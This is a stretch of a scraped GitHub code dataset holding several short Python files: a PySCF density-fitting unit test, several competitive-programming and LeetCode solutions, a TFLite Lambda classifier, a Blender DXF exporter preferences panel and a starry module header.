.5 .5; C .1 1.3 2.1'\ncell.basis = {'He': [(0, (2.5, 1)), (0, (1., 1))],\n 'C' :'gth-szv',}\ncell.pseudo = {'C':'gth-pade'}\ncell.h = np.eye(3) * 2.5\ncell.gs = [10] * 3\ncell.build()\nnp.random.seed(1)\nkpts = np.random.random((4,3))\nkpts[3] = kpts[0]-kpts[1]+kpts[2]\nkpt0 = np.zeros(3)\n\ncell1 = pgto.Cell()\ncell1.atom = 'He 1. .5 .5; He .1 1.3 2.1'\ncell1.basis = {'He': [(0, (2.5, 1)), (0, (1., 1))]}\ncell1.h = np.eye(3) * 2.5\ncell1.gs = [10] * 3\ncell1.build()\nkdf0 = mdf.MDF(cell1)\nkdf0.kpts = kpts\n\n\ndef finger(a):\n w = np.cos(np.arange(a.size))\n return np.dot(w, a.ravel())\n\nclass KnowValues(unittest.TestCase):\n def test_pwdf_get_nuc(self):\n v0 = fft.DF(cell).get_nuc(kpts[0])\n df = pwdf.PWDF(cell)\n v1 = df.get_nuc(kpts[0])\n self.assertTrue(np.allclose(v0, v1, atol=1e-4, rtol=1e-4))\n self.assertAlmostEqual(finger(v1), (-5.7646030917912663+0.19126291999423831j), 8)\n\n def test_pwdf_get_pp(self):\n v0 = pgto.pseudo.get_pp(cell, kpts[0])\n v1 = pwdf.PWDF(cell).get_pp(kpts)\n self.assertTrue(np.allclose(v0, v1[0], atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(v1[0]), (-5.6240249381230019+0.22094834207065794j), 8)\n\n v0 = pgto.pseudo.get_pp(cell, kpts[1])\n self.assertTrue(np.allclose(v0, v1[1], atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(v1[1]), (-5.53877028746+1.04393337137j) , 8)\n self.assertAlmostEqual(finger(v1[2]), (-6.05309001635+0.281728966125j), 8)\n self.assertAlmostEqual(finger(v1[3]), (-5.60115438406+0.275973062578j), 8)\n\n def test_pwdf_get_ao_eri(self):\n df0 = fft.DF(cell)\n df = pwdf.PWDF(cell)\n eri0 = df0.get_ao_eri(compact=True)\n eri1 = df.get_ao_eri(compact=True)\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), 0.80425361966560172, 8)\n\n eri0 = df0.get_ao_eri(kpts[0])\n eri1 = df.get_ao_eri(kpts[0])\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), (2.9346374476387949-0.20479054936779137j), 8)\n\n eri0 = df0.get_ao_eri(kpts)\n eri1 = df.get_ao_eri(kpts)\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), (0.33709287302019619-0.94185725020966538j), 8)\n\n def test_get_eri_gamma(self):\n odf0 = mdf.MDF(cell1)\n odf = pwdf.PWDF(cell1)\n ref = odf0.get_eri()\n eri0000 = odf.get_eri(compact=True)\n self.assertTrue(eri0000.dtype == numpy.double)\n self.assertTrue(np.allclose(eri0000, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri0000), 0.23714016293926865, 9)\n\n ref = kdf0.get_eri((kpts[0],kpts[0],kpts[0],kpts[0]))\n eri1111 = odf.get_eri((kpts[0],kpts[0],kpts[0],kpts[0]))\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri1111), (1.2410388899583582-5.2370501878355006e-06j), 9)\n\n eri1111 = odf.get_eri((kpts[0]+1e-8,kpts[0]+1e-8,kpts[0],kpts[0]))\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri1111), (1.2410388899583582-5.2370501878355006e-06j), 9)\n\n def test_get_eri_0011(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n eri0011 = odf.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n self.assertTrue(np.allclose(eri0011, ref, atol=1e-3, rtol=1e-3))\n self.assertAlmostEqual(finger(eri0011), (1.2410162858084512+0.00074485383749912936j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, (kpts[0],kpts[0],kpts[1],kpts[1]))\n eri0011 = odf.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n 
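# PWDF and the FFT-DF reference computed just above are expected to agree to the tight 1e-9 tolerances.\n        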
self.assertTrue(np.allclose(eri0011, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0011), (1.2410162860852818+0.00074485383748954838j), 9)\n\n def test_get_eri_0110(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n eri0110 = odf.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-6, rtol=1e-6))\n eri0110 = odf.get_eri((kpts[0]+1e-8,kpts[1]+1e-8,kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, (kpts[0],kpts[1],kpts[1],kpts[0]))\n eri0110 = odf.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n eri0110 = odf.get_eri((kpts[0]+1e-8,kpts[1]+1e-8,kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n\n def test_get_eri_0123(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri(kpts)\n eri1111 = odf.get_eri(kpts)\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-8, rtol=1e-8))\n self.assertAlmostEqual(finger(eri1111), (1.2917759427391706-0.013340252488069412j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, kpts)\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-8, rtol=1e-8))\n\n def test_get_mo_eri(self):\n df0 = fft.DF(cell)\n odf = pwdf.PWDF(cell)\n nao = cell.nao_nr()\n numpy.random.seed(5)\n mo =(numpy.random.random((nao,nao)) +\n numpy.random.random((nao,nao))*1j)\n eri_mo0 = df0.get_mo_eri((mo,)*4, kpts)\n eri_mo1 = odf.get_mo_eri((mo,)*4, kpts)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n kpts_t = (kpts[2],kpts[3],kpts[0],kpts[1])\n eri_mo2 = df0.get_mo_eri((mo,)*4, kpts_t)\n eri_mo2 = eri_mo2.reshape((nao,)*4).transpose(2,3,0,1).reshape(nao**2,-1)\n self.assertTrue(np.allclose(eri_mo2, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],)*4)\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],)*4)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],kpts[1],kpts[1],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],kpts[1],kpts[1],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpt0,kpt0,kpts[0],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpt0,kpt0,kpts[0],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],kpts[0],kpt0,kpt0,))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],kpts[0],kpt0,kpt0,))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n mo1 = mo[:,:nao//2+1]\n eri_mo0 = df0.get_mo_eri((mo1,mo,mo,mo1), (kpts[0],)*4)\n eri_mo1 = odf.get_mo_eri((mo1,mo,mo,mo1), (kpts[0],)*4)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo1,mo,mo1,mo), (kpts[0],kpts[1],kpts[1],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo1,mo,mo1,mo), (kpts[0],kpts[1],kpts[1],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n\nif __name__ == '__main__':\n print(\"Full Tests for pwdf\")\n 
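# Discover and run all test cases defined in KnowValues.\n    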
unittest.main()\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"pbc/df/test/test_pwdf.py","file_name":"test_pwdf.py","file_ext":"py","file_size_in_byte":17110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8433882160","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/118666\ndef solution(survey, choices):\n res = ''\n score = {'R' : 0, 'T' :0, 'C' : 0, 'F' : 0, 'J' : 0, 'M' : 0, 'A' : 0, 'N' : 0}\n for survey, choice in zip(survey, choices):\n if choice > 4:\n score[survey[1]] += choice - 4\n elif choice < 4:\n score[survey[0]] += 4-choice\n if score['R'] >= score['T']:\n res += 'R'\n else:\n res += 'T'\n if score['C'] >= score['F']:\n res += 'C'\n else:\n res += 'F'\n if score['J'] >= score['M']:\n res += 'J'\n else:\n res += 'M'\n if score['A'] >= score['N']:\n res += 'A'\n else:\n res += 'N'\n return res","repo_name":"ha2hi/Python","sub_path":"코딩테스트/프로그래머스/Lv.1/성격 유형 검사하기.py","file_name":"성격 유형 검사하기.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8813298502","text":"'''\nOverview:\n\n\tGiven an integer array nums, find the contiguous subarray within an array (containing at least one number) which has the largest product.\n\nSolution:\n\n\tEnhanced DP:\n\n\t\tdp_i is used to record 2 values: min and max product end with i\n\n\t\tdp_i_min = min(dp_i-1_min * num_i, num_i)\n\t\tdp_i_max = max(dp_i-1_max * num_i, num_i)\n\n\tThis is because multiply with negative number will exchange the value of min and max.\n'''\n\nclass Solution2:\n def maxProduct(self, nums: List[int]) -> int:\n min_ = max_ = out = nums[0]\n for a in nums[1:]:\n if a < 0:\n min_, max_ = max_, min_\n min_, max_ = min(a, min_*a), max(a, max_*a)\n out = max(max_, out)\n return out","repo_name":"SamuelGYX/leetcode_records","sub_path":"souce/152 Maximum Product Subarray.py","file_name":"152 Maximum Product Subarray.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22463095561","text":"# 61kmers.py\n\n# Make a program that reports the kmer counts for a fasta file\n# Your program should take 2 arguments:\n# 1. The file name\n# 2. 
The size of k\n\n# Hint: use argparse\n# Hint: use mcb185.read_fasta()\n\nimport argparse\nimport mcb185\n\nparser = argparse.ArgumentParser(description=\"Fasta file Kmer counts\")\nparser.add_argument('file', type=str, metavar='', help='input')\nparser.add_argument('k', type=int, metavar='', help='Size of Kmer')\n\narg = parser.parse_args()\n\nkmers = {}\n\nfor name, seq in mcb185.read_fasta(arg.file):\n\tfor i in range(0, len(seq) - arg.k + 1):\n\t\tentry = seq[i:i+arg.k]\n\t\tif entry not in kmers:\n\t\t\tkmers[entry] = 1\n\t\telse:\n\t\t\tkmers[entry] += 1\n\nformatting = list(kmers.keys())\nformatting.sort()\n\nfor i in formatting:\n\tprint(i, kmers[i])\n\n\"\"\"\npython3 61kmers.py ~/DATA/E.coli/GCF_000005845.2_ASM584v2_genomic.fna.gz 2\nAA 338006\nAC 256773\nAG 238013\nAT 309950\nCA 325327\nCC 271821\nCG 346793\nCT 236149\nGA 267384\nGC 384102\nGG 270252\nGT 255699\nTA 212024\nTC 267395\nTG 322379\nTT 339584\n\"\"\"\n","repo_name":"mlee117/homework","sub_path":"61kmers.py","file_name":"61kmers.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16027249134","text":"# Electing the President (BOJ 2660), Gold 5, BFS\n\nfrom sys import stdin\nfrom collections import deque\n\nn = int(stdin.readline())\ngraph = [[] for _ in range(n+1)]\n\nwhile 1:\n    a, b = map(int, stdin.readline().split())\n    if a==b==-1:\n        break\n    graph[a].append(b)\n    graph[b].append(a)\n\ndef bfs(s):\n    q = deque([s])\n    visited[s] = 0\n\n    while q:\n        x = q.popleft()\n        for v in graph[x]:\n            if visited[v] == -1:\n                visited[v] = visited[x] + 1\n                q.append(v)\n\nnum = 51\nres = []\nfor i in range(1, n+1):\n    visited=[-1]*(n+1)\n    bfs(i)\n    tmp = max(visited[1:])\n    if tmp == num:\n        res.append(i)\n    elif tmp < num:\n        res = [i]\n        num = tmp\n\nprint(num, len(res))\nprint(*res)\n\n\n","repo_name":"lookinmin/CodingTest","sub_path":"그래프/BOJ_2660.py","file_name":"BOJ_2660.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"20118443058","text":"from typing import Any, Dict, List, Sequence\nfrom uuid import UUID\n\nfrom ..offline import TranslationMap\nfrom ..types import IdType, NameType, SourceType\nfrom . import DataStructureIO\nfrom .exceptions import NotInplaceTranslatableError\n\n\nclass SingleValueIO(DataStructureIO):\n    \"\"\"Implementation for non-iterables. And strings.\"\"\"\n\n    @staticmethod\n    def handles_type(arg: Any) -> bool:\n        return isinstance(arg, (int, str, UUID))\n\n    @staticmethod\n    def extract(translatable: IdType, names: List[NameType]) -> Dict[NameType, Sequence[IdType]]:\n        if len(names) != 1:  # pragma: no cover\n            raise ValueError(\"Length of names must be one.\")\n\n        return {names[0]: (translatable,)}\n\n    @staticmethod\n    def insert(\n        translatable: IdType, names: List[NameType], tmap: TranslationMap[NameType, SourceType, IdType], copy: bool\n    ) -> str:\n        if not copy:  # pragma: no cover\n            raise NotInplaceTranslatableError(translatable)\n\n        return tmap[names[0]][translatable]\n","repo_name":"rsundqvist/id-translation","sub_path":"src/id_translation/dio/_single_value.py","file_name":"_single_value.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74885212533","text":"from fractions import Fraction #included in challenge\nfrom functools import reduce #included in challenge\n\ndef product(fracs):\n    t = reduce(lambda x, y: x*y, fracs) #task was to write single line reduce function so that it is valid for test cases\n    return t.numerator, t.denominator\n    \n#test cases by HackerRank\nif __name__ == '__main__':\n    fracs = []\n    for _ in range(int(input())):\n        fracs.append(Fraction(*map(int, input().split())))\n    result = product(fracs)\n    print(*result)\n","repo_name":"yxmauw/HackerRank","sub_path":"Medium/Reduce Function.py","file_name":"Reduce Function.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"5622990782","text":"import numpy as np\n\n\ndef greedy_scheduler(jobs, method):\n\n    # Check jobs array has correct number of columns (2: weights and lengths).\n    if jobs.shape[1] != 2:\n        raise ValueError(\"Incorrect number of columns in jobs argument\")\n\n    if method == \"difference\":\n        # score of each job is its weight minus length\n        scores = jobs[:, 0] - jobs[:, 1]\n    elif method == \"ratio\":\n        # score of each job is its weight divided by its length\n        scores = jobs[:, 0] / jobs[:, 1]\n    else:\n        # method argument is not defined\n        raise ValueError(\"Invalid method argument\")\n\n    job_order = np.lexsort((jobs[:, 0], scores))[::-1]\n    completion_times = np.cumsum(jobs[job_order,1])\n    # weights must be taken in the same (scheduled) order as the completion times\n    cost = np.sum(completion_times * jobs[job_order,0])\n\n    return cost\n","repo_name":"albertwildeman/Greedy-Scheduling","sub_path":"GreedySchedulerLib.py","file_name":"GreedySchedulerLib.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"35437934053","text":"from typing import List\nfrom collections import defaultdict\nfrom collections import deque \nfrom collections import Counter\nimport heapq\nimport math\n\n# Problem 1 - Sliding Window Maximum\n\"\"\"\n* * HARD PROBLEM\nYou are given an array of integers nums, there is a sliding window of size k which is moving \nfrom the very left of the array to the very right. You can only see the k numbers in the window. 
\nEach time the sliding window moves right by one position.\n\nReturn the max sliding window.\n\nExample 1:\nInput: nums = [1,3,-1,-3,5,3,6,7], k = 3\nOutput: [3,3,5,5,6,7]\nExplanation: \nWindow position Max\n--------------- -----\n[1 3 -1] -3 5 3 6 7 3\n 1 [3 -1 -3] 5 3 6 7 3\n 1 3 [-1 -3 5] 3 6 7 5\n 1 3 -1 [-3 5 3] 6 7 5\n 1 3 -1 -3 [5 3 6] 7 6\n 1 3 -1 -3 5 [3 6 7] 7\n\"\"\"\n# Uses the concept of monotonic decreasing queue\nclass Solution:\n def maxSlidingWindow(self, nums: List[int], k: int) -> List[int]:\n result = []\n q = deque() # q will store indices\n\n l, r = 0, 0\n while r < len(nums):\n # push the element to the queue\n # but before pushing check whether queue follows monotonic decreasing property\n while q and nums[q[-1]] < nums[r]:\n q.pop()\n # now we push the element\n q.append(r)\n\n # if element is out-of bound in the sliding window\n # remove it from the queue\n if l > q[0]:\n q.popleft()\n\n # if window is of size k\n if (r + 1) >= k:\n result.append(nums[q[0]])\n l += 1\n\n r += 1\n\n return result\n\n\n\n\n# 2. Minimum Window Substring\n\"\"\"\nhttps://leetcode.com/problems/minimum-window-substring\nGiven two strings s and t of lengths m and n respectively, return the minimum window \nsubstring of s such that every character in t (including duplicates) is included in the window. \nIf there is no such substring, return the empty string \"\".\n\nThe testcases will be generated such that the answer is unique.\n\nInput: s = \"ADOBECODEBANC\", t = \"ABC\"\nOutput: \"BANC\"\nExplanation: The minimum window substring \"BANC\" includes 'A', 'B', and 'C' from string t.\n\"\"\"\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n if not t: return \"\"\n\n t_count = Counter(t)\n s_count = {k : 0 for k, _ in t_count.items()}\n\n having, needed = 0, len(t_count)\n\n res = \"\"\n minLength = math.inf\n\n l, r = 0, 0\n while r < len(s):\n if s[r] in t_count:\n s_count[s[r]] += 1\n # we will increment having iff both counter values are same\n if s_count[s[r]] == t_count[s[r]]:\n having += 1\n\n while having == needed and l <= r:\n window_size = r - l + 1\n if window_size < minLength:\n res = s[l:r+1]\n minLength = window_size\n\n if s[l] in s_count:\n s_count[s[l]] -= 1\n if s_count[s[l]] < t_count[s[l]]:\n having -= 1\n\n l += 1\n\n r += 1\n\n return res\n\n\n\n\n# 3. Longest Repeating Character Replacement\n\"\"\"\nhttps://leetcode.com/problems/longest-repeating-character-replacement/\nYou are given a string s and an integer k. You can choose any character of the string \nand change it to any other uppercase English character. You can perform this operation \nat most k times.\n\nReturn the length of the longest substring containing the same letter you can get after \nperforming the above operations.\n\nInput: s = \"ABAB\", k = 2\nOutput: 4\nExplanation: Replace the two 'A's with two 'B's or vice versa.\n\nInput: s = \"AABABBA\", k = 1\nOutput: 4\nExplanation: Replace the one 'A' in the middle with 'B' and form \"AABBBBA\".\nThe substring \"BBBB\" has the longest repeating letters, which is 4.\n\"\"\"\n# Sliding window validation equation \n# windowLen - count(most_freq_char) <= k \nclass Solution:\n def characterReplacement(self, s: str, k: int) -> int:\n count = {}\n res = 0\n\n l = 0\n maxf = 0\n for r in range(len(s)):\n count[s[r]] = 1 + count.get(s[r], 0)\n maxf = max(maxf, count[s[r]])\n\n if (r - l + 1) - maxf > k:\n count[s[l]] -= 1\n l += 1\n\n res = max(res, r - l + 1)\n return res\n\n\n\n\n# 4. 
Longest Substring Without Repeating Characters\n\"\"\"\nhttps://leetcode.com/problems/longest-substring-without-repeating-characters/\nGiven a string s, find the length of the longest \nsubstring without repeating characters.\n\nInput: s = \"abcabcbb\"\nOutput: 3\nExplanation: The answer is \"abc\", with the length of 3.\n\nInput: s = \"pwwkew\"\nOutput: 3\nExplanation: The answer is \"wke\", with the length of 3.\nNotice that the answer must be a substring, \"pwke\" is a subsequence and not a substring.\n\"\"\"\nclass Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n charSet = set()\n l = 0\n res = 0\n\n for r in range(len(s)):\n while s[r] in charSet:\n charSet.remove(s[l])\n l += 1\n charSet.add(s[r])\n res = max(res, r - l + 1)\n return res\n\n\n\n\n# 5. Number of Sub-arrays of Size K and Average Greater than or Equal to Threshold\n\"\"\"\nhttps://leetcode.com/problems/number-of-sub-arrays-of-size-k-and-average-greater-than-or-equal-to-threshold/\nGiven an array of integers arr and two integers k and threshold, return the number of \nsub-arrays of size k and average greater than or equal to threshold.\n\nInput: arr = [2,2,2,2,5,5,5,8], k = 3, threshold = 4\nOutput: 3\nExplanation: Sub-arrays [2,5,5],[5,5,5] and [5,5,8] have averages 4, 5 and 6 respectively. \nAll other sub-arrays of size 3 have averages less than 4 (the threshold).\n\"\"\"\nclass Solution:\n def numOfSubarrays(self, arr: List[int], k: int, threshold: int) -> int:\n res = 0\n curSum = sum(arr[:k-1])\n\n for L in range(len(arr) - k + 1):\n curSum += arr[L + k - 1]\n if (curSum / k) >= threshold:\n res += 1\n curSum -= arr[L]\n return res\n\n\n\n\n# 6. Contains Duplicate II\n\"\"\"\nhttps://leetcode.com/problems/contains-duplicate-ii/\nGiven an integer array nums and an integer k, return true if there are two \ndistinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\n\nInput: nums = [1,2,3,1], k = 3\nOutput: true\n\nInput: nums = [1,2,3,1,2,3], k = 2\nOutput: false\n\"\"\"\n# Note here the sliding window size will be k + 1 bcoz of this condition abs(i - j) <= k\nclass Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n window = set()\n L = 0\n\n for R in range(len(nums)):\n if R - L > k:\n window.remove(nums[L])\n L += 1\n if nums[R] in window:\n return True\n window.add(nums[R])\n return False\n\n\n\n\n# 7. Best Time to Buy and Sell Stock\n\"\"\"\nhttps://leetcode.com/problems/best-time-to-buy-and-sell-stock/\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a \ndifferent day in the future to sell that stock.\n\nReturn the maximum profit you can achieve from this transaction. \nIf you cannot achieve any profit, return 0.\n\nInput: prices = [7,1,5,3,6,4]\nOutput: 5\nExplanation: Buy on day 2 (price = 1) and sell on day 5 (price = 6), profit = 6-1 = 5.\nNote that buying on day 2 and selling on day 1 is not allowed because you must buy before you sell.\n\"\"\"\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n l, r = 0, 1 # l is buy & r is sell\n max_profit = 0\n\n while r < len(prices):\n if prices[l] < prices[r]:\n profit = prices[r] - prices[l]\n max_profit = max(profit, max_profit)\n else:\n l = r\n r += 1\n\n return max_profit \n\n\n\n\n# 8. 
Subarray Product Less Than K\n\"\"\"\nhttps://leetcode.com/problems/subarray-product-less-than-k/\nGiven an array of integers nums and an integer k, return the number of contiguous subarrays \nwhere the product of all the elements in the subarray is strictly less than k.\n\nInput: nums = [10,5,2,6], k = 100\nOutput: 8\nExplanation: The 8 subarrays that have product less than 100 are:\n[10], [5], [2], [6], [10, 5], [5, 2], [2, 6], [5, 2, 6]\nNote that [10, 5, 2] is not included as the product of 100 is not strictly less than k.\n\"\"\"\nclass Solution:\n    def numSubarrayProductLessThanK(self, nums: List[int], k: int) -> int:\n        # using sliding window technique\n        l, r = 0, 0\n        prod = 1\n        count = 0\n        while r < len(nums):\n            prod = prod * nums[r]\n            \n            while l < len(nums) and prod >= k:\n                prod = prod / nums[l]\n                l += 1\n\n            if prod < k:\n                count += (r - l + 1)\n            \n            r += 1\n\n        return count\n    \n\n\n\n# 9. Max Consecutive Ones III\n\"\"\"\n* * Important question\nhttps://leetcode.com/problems/max-consecutive-ones-iii\nGiven a binary array nums and an integer k, return the maximum number of consecutive 1's in \nthe array if you can flip at most k 0's.\n\nInput: nums = [1,1,1,0,0,0,1,1,1,1,0], k = 2\nOutput: 6\nExplanation: [1,1,1,0,0,1,1,1,1,1,1]\n             -----------\nBolded numbers were flipped from 0 to 1. The longest subarray is underlined.\n\"\"\"\nclass Solution:\n    def longestOnes(self, nums: List[int], k: int) -> int:\n        res = 0\n\n        l, r = 0, 0\n        cnt = 0\n        while r < len(nums):\n            if nums[r] == 0:\n                cnt += 1\n\n            # sliding window shrinking condition cnt <= k\n            while cnt > k:\n                if nums[l] == 0:\n                    cnt -= 1\n                l += 1\n\n            res = max(res, (r - l) + 1)\n            r += 1\n\n        return res\n","repo_name":"chafale/Data-Structure-and-Algorithms","sub_path":"5_Sliding Window.py","file_name":"5_Sliding Window.py","file_ext":"py","file_size_in_byte":10047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"14088426160","text":"import json\nimport tflite_runtime.interpreter as tflite\nfrom keras_image_helper import create_preprocessor\n\n\nmodel = 'cats-dogs-v2.tflite'\npreprocessor = create_preprocessor('xception', target_size=(150, 150))\n\ninterpreter = tflite.Interpreter(model_path=model)\ninterpreter.allocate_tensors()\n\n\ninput_index = interpreter.get_input_details()[0]['index']\noutput_index = interpreter.get_output_details()[0]['index']\n\n\ndef predict(url):\n    X = preprocessor.from_url(url)\n    interpreter.set_tensor(input_index, X)\n    interpreter.invoke()\n    pred = interpreter.get_tensor(output_index)\n    return pred[0].tolist()\n\n\ndef lambda_handler(event, context):\n    # print(\"parameters:\", event)\n    url = event['url']\n    results = predict(url)\n    return results\n","repo_name":"RickyMcMaster/pub_portfolio","sub_path":"mlz/09-serverless/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25276112042","text":"\r\nMOD = int(1e9) + 7\r\n\r\ndef main():\r\n    buf = input()\r\n    L = list(map(int, list(buf)))\r\n    L.reverse()\r\n    # If one side is 0, the answer is trivial\r\n    # If no carry occurs, the condition is satisfied\r\n    # For a single number there are 2^(number of 1 bits) patterns\r\n    bit1 = 2\r\n    bit_list = []\r\n    pow2 = [1]\r\n    for i in range(len(L)):\r\n        bit_list.append(bit1)\r\n        bit1 = (bit1 * 3) % MOD\r\n        pow2.append((pow2[-1] * 2) % MOD)\r\n    pattern = 1\r\n    print(L)\r\n    print(bit_list)\r\n    for i, x in enumerate(L):\r\n        if x == 0:\r\n            pattern = (pattern - bit_list[i]) % MOD\r\n        else: # x == 1\r\n            pattern = (pattern + 
bit_list[i]) % MOD\r\n print(pattern)\r\n\r\n#2\r\n#2 4\r\n#2 4 4 8\r\n#2 4 4 8 4 8 8 16\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"takumi152/atcoder","sub_path":"abc129e.py","file_name":"abc129e.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43220718","text":"import bpy\n\nfrom ezdxf_exporter.core.preferences.misc import draw_preferences_misc\nfrom ezdxf_exporter.data.color.ui import draw_preferences_aci\nfrom ezdxf_exporter.data.layer.ui import draw_preferences_layer\nfrom ezdxf_exporter.data.unit.ui import draw_preferences_unit\nfrom ezdxf_exporter.core.preferences.dependencies import draw_preferences_dependencies\n\nfrom ezdxf_exporter.core.preferences.dependencies import dependencies_installed\n\nfrom .prop import Settings\n\n\ndraw_prefs_map = {\n \"palette_aci\": draw_preferences_aci,\n \"layer\": draw_preferences_layer,\n \"unit\": draw_preferences_unit,\n \"dependencies\": draw_preferences_dependencies,\n \"misc\": draw_preferences_misc,\n}\n\n\nclass DXFEXPORTERAddonPreferences(bpy.types.AddonPreferences):\n bl_idname = \"ezdxf_exporter\"\n\n category: bpy.props.EnumProperty(\n items=(\n (\"misc\", \"Misc.\", \"\"),\n (\"palette_aci\", \"ACI Palette\", \"\"),\n (\"layer\", \"Layers\", \"\"),\n (\"unit\", \"Units\", \"\"),\n (\"dependencies\", \"Dependencies\", \"\"),\n )\n )\n settings: bpy.props.PointerProperty(type=Settings)\n\n def draw(self, context):\n layout = self.layout\n if dependencies_installed:\n row = layout.row()\n row.prop_tabs_enum(self, \"category\")\n\n draw_prefs_map.get(self.category)(self.settings, layout.box())\n else:\n draw_preferences_dependencies(None, layout)\n","repo_name":"Gorgious56/blender_ezdxf_exporter","sub_path":"core/preferences/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"20359601647","text":"# -*- coding: utf-8 -*-\nfrom .ops import (\n RxOp,\n tensordotRzOp,\n special_tensordotRzOp,\n rTA1Op,\n rTA1LOp,\n CheckBoundsOp,\n)\nfrom .wigner import R\nfrom .defaults import defaults\nfrom .math import cast\nfrom .compat import theano, tt, ifelse\nfrom scipy.special import gamma, hyp2f1\nimport numpy as np\nfrom tqdm import tqdm\nimport 